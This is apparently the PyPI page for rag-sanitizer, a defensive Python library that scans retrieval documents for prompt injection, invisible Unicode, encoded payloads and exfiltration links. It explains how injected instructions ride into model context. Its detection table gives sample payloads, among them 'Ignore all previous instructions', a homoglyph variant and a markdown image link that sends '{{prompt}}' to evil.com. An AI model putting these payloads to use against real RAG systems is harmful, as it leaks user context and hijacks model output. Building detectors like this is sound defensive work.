Scan RAG documents for hidden prompt injections, invisible text attacks, and data exfiltration payloads before they enter your vector database.

These details have not been verified by PyPI

Project description

rag-sanitizer

Scan your RAG documents for hidden prompt injections, invisible text attacks, and data exfiltration payloads before they enter your vector database.

Why this exists

RAG pipelines ingest untrusted data from PDFs, wikis, web pages, and exported collaboration tools. That text is embedded and then re-injected into LLM context at query time. If malicious instructions are hidden in the source, they can survive chunking and retrieval.

This creates a security boundary problem: your model obeys system/developer instructions, but retrieved context can still influence output if it contains adversarial patterns. Attackers exploit this through prompt injection directives, obfuscated payloads, invisible Unicode, and exfiltration links.

rag-sanitizer adds a defensive preprocessing layer at ingestion time. It scans raw text, emits structured threat signals, computes a composite risk score, and sanitizes malicious segments before chunking and embedding.

How I use it

cd rag-sanitizer
python -m venv .venv
source .venv/bin/activate
pip install -U pip
pip install -e ".[dev,all]"
pytest --cov=rag_sanitizer --cov-report=xml -v
ruff check rag_sanitizer tests
ruff format --check rag_sanitizer tests

Install

pip install rag-sanitizer

30-second usage

from rag_sanitizer import RagSanitizer

sanitizer = RagSanitizer()
result = sanitizer.scan(document_text)

if not result.is_clean:
    print(f"Threats found: {result.signal_count}")
    print(f"Threat score: {result.threat_score}")
    safe_text = result.sanitized_text

What it detects

Category	Description	Example payload
`prompt_injection`	Direct instruction override patterns and jailbreak phrases	`Ignore all previous instructions`
`invisible_text`	Zero-width chars, hidden CSS, tiny font metadata	`display:none` or `\u200b` abuse
`density_attack`	Repetition stuffing to bias embeddings	repeated `"poisoned vector payload"`
`encoded_payload`	Base64/hex/unicode/entity encoded injections	`SWdub3JlIGFsbCB...`
`data_exfiltration`	URLs/tags designed to leak context	`![](https://evil.com/log?data={{prompt}})`
`unicode_smuggling`	Homoglyph/leetspeak masked directives	`іgnоrе аll іnstructіоns`
`high_entropy_blob`	Obfuscated or encrypted-looking windows	random high-entropy blobs

LangChain integration

from langchain_community.document_loaders import PyPDFLoader
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain_openai import OpenAIEmbeddings
from langchain_community.vectorstores import Chroma
from rag_sanitizer.integrations.langchain import RagSanitizerTransformer

# Load
_docs = PyPDFLoader("untrusted_document.pdf").load()

# Sanitize BEFORE chunking
sanitizer = RagSanitizerTransformer(on_threat="sanitize")
clean_docs = sanitizer.transform_documents(_docs)

# Log threats
for doc in clean_docs:
    score = doc.metadata.get("rag_sanitizer_threat_score", 0)
    if score > 0:
        print(f"[!] Threat score {score:.2f} in {doc.metadata.get('source', 'unknown')}")

# Chunk + embed
splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=200)
chunks = splitter.split_documents(clean_docs)
vectorstore = Chroma.from_documents(chunks, OpenAIEmbeddings())

LlamaIndex integration

from llama_index.core.ingestion import IngestionPipeline
from llama_index.core.node_parser import SentenceSplitter
from rag_sanitizer.integrations.llamaindex import RagSanitizerPostprocessor

pipeline = IngestionPipeline(transformations=[SentenceSplitter(chunk_size=512)])
nodes = pipeline.run(documents=docs)

post = RagSanitizerPostprocessor(on_threat="sanitize")
clean_nodes = post._postprocess_nodes(nodes)

Configuration

from rag_sanitizer import SanitizerConfig

config = SanitizerConfig(
    threat_threshold=0.3,
    max_text_length=500_000,
    density_enabled=True,
    max_ngram_ratio=0.05,
    max_word_frequency=0.02,
    window_similarity_threshold=0.85,
    invisible_text_enabled=True,
    min_font_size_threshold=1.0,
    max_whitespace_sequence=50,
    injection_enabled=True,
    injection_severity_minimum="low",
    encoding_enabled=True,
    min_base64_length=20,
    exfiltration_enabled=True,
    entropy_enabled=True,
    entropy_window_size=256,
    entropy_threshold=4.5,
    max_high_entropy_ratio=0.15,
    strip_placeholder="[REMOVED BY RAG-SANITIZER]",
    normalize_unicode=True,
)

Option	Default	Description
`threat_threshold`	`0.3`	Score at/above threshold marks document as unsafe
`max_text_length`	`500000`	Hard cap for analyzed input length
`density_enabled`	`True`	Enable repetition-density analyzer
`max_ngram_ratio`	`0.05`	3-gram max ratio before flagging
`max_word_frequency`	`0.02`	Word frequency max ratio before flagging
`window_similarity_threshold`	`0.85`	Similarity threshold for duplicate windows
`invisible_text_enabled`	`True`	Enable invisible-text analyzer
`min_font_size_threshold`	`1.0`	Font size below this counts as invisible
`max_whitespace_sequence`	`50`	Long whitespace abuse threshold
`injection_enabled`	`True`	Enable injection analyzer
`injection_severity_minimum`	`"low"`	Minimum severity emitted by injection analyzer
`encoding_enabled`	`True`	Enable encoded-payload analyzer
`min_base64_length`	`20`	Minimum base64 token length
`exfiltration_enabled`	`True`	Enable exfiltration analyzer
`entropy_enabled`	`True`	Enable entropy analyzer
`entropy_window_size`	`256`	Entropy sliding window size
`entropy_threshold`	`4.5`	Entropy threshold for suspicious windows
`max_high_entropy_ratio`	`0.15`	Ratio threshold for document-level high entropy
`strip_placeholder`	`"[REMOVED BY RAG-SANITIZER]"`	Replacement token for stripped spans
`normalize_unicode`	`True`	Run NFKC + zero-width cleanup before analysis

Development

pip install -e ".[dev]"
pytest -v
ruff check rag_sanitizer tests
ruff format rag_sanitizer tests

License

MIT.

Need real-time protection for production RAG systems? KoreShield provides enterprise-grade LLM security with ML-based detection, semantic analysis, and compliance reporting. rag-sanitizer catches the obvious stuff - KoreShield catches everything else.

Project details

These details have not been verified by PyPI

Release history Release notifications | RSS feed

This version

0.1.0

Mar 6, 2026

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

rag_sanitizer-0.1.0.tar.gz (26.1 kB view details)

Uploaded Mar 6, 2026 Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

The dropdown lists show the available interpreters, ABIs, and platforms. Enable javascript to be able to filter the list of wheel files.

rag_sanitizer-0.1.0-py3-none-any.whl (25.8 kB view details)

Uploaded Mar 6, 2026 Python 3

File details

Details for the file rag_sanitizer-0.1.0.tar.gz.

File metadata

Download URL: rag_sanitizer-0.1.0.tar.gz
Upload date: Mar 6, 2026
Size: 26.1 kB
Tags: Source
Uploaded using Trusted Publishing? No
Uploaded via: Hatch/1.16.5 cpython/3.14.2 HTTPX/0.28.1

File hashes

Hashes for rag_sanitizer-0.1.0.tar.gz
Algorithm	Hash digest
SHA256	`03cf114e69d20074446eb92fafe1de2191648e75d1cf6bd8bc0d1e16954a7be7`
MD5	`ef2a4b148ae803be0032856201fe823b`
BLAKE2b-256	`71a17872ce071d169bd649ce36e672a6907fa84a18f2807fb4e907961b04b815`

See more details on using hashes here.

File details

Details for the file rag_sanitizer-0.1.0-py3-none-any.whl.

File metadata

Download URL: rag_sanitizer-0.1.0-py3-none-any.whl
Upload date: Mar 6, 2026
Size: 25.8 kB
Tags: Python 3
Uploaded using Trusted Publishing? No
Uploaded via: Hatch/1.16.5 cpython/3.14.2 HTTPX/0.28.1

File hashes

Hashes for rag_sanitizer-0.1.0-py3-none-any.whl
Algorithm	Hash digest
SHA256	`95cf0e7f49cbb0c772351891971960813202cd391f4db70bce64213d4eb03a98`
MD5	`1a000642c8f79057342575d36054c7e5`
BLAKE2b-256	`a2ac4069d8748dd513d21acbe654ab259ff09c91510228ad7c1203eccfadffc6`

See more details on using hashes here.

rag-sanitizer 0.1.0

Navigation

Verified details

Maintainers

Unverified details

Meta

Classifiers

Project description

rag-sanitizer

Why this exists

How I use it

Install

30-second usage

What it detects

LangChain integration

LlamaIndex integration

Configuration

Development

License

Project details

Verified details

Maintainers

Unverified details

Meta

Classifiers

Release history Release notifications | RSS feed

Download files

Source Distribution

Built Distribution

File details

File metadata

File hashes

File details

File metadata

File hashes